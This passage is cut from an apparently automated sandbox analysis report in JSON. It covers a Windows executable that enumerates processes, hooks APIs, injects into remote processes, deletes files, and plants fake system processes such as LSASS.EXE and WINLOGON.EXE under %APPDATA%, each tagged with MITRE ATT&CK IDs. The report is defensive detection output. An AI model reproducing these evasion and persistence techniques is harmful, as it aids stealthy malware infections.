(UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005712)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"CreateDirectoryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"Process32NextW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateProcessW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateProcessA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadResource@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CopyFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindResourceA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CopyFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"WinExec@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"Process32FirstW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetProcAddress@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"OpenMutexA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindResourceW@KERNEL32.DLL\" in \"WINLOGON.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\smss.exe\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\csrss.exe\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\4K51K4.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\4K51K4.EXE\" with delete access\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\4K51K4.EXE\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\share\\4K51K4\\New Folder.exe\" for deletion\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"K:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"L:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"M:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"N:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"O:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"P:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"Q:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"R:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"S:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"T:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"U:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"V:\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" (UID: 00000000-00005712)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006008)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006060)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005992)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005968)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006128)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005484)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005984)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006080)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004168)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004244)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004220)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006064)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003992)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003996)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002256)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003456)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003436)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000132)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002248)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004208)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003180)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004384)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003592)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001580)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003232)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003540)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003708)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004256)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004404)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003940)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003276)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003836)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004428)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001176)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003952)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004408)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000500)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000472)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001584)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000884)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002164)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000284)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002472)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00000416)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004448)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004444)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003268)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001216)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003452)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003824)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001352)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 608)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 608)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 608)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" allocated memory in \"C:\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\"\n \"4k51k4.exe\" allocated memory in \"%WINDIR%\\4k51k4.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006128)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005484)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005984)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006080)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004220)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00006064)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003996)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002256)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002792)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003456)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003436)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00000132)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003180)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004384)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003592)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001580)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003540)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003708)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003940)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003276)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003836)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004428)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001176)\n Process 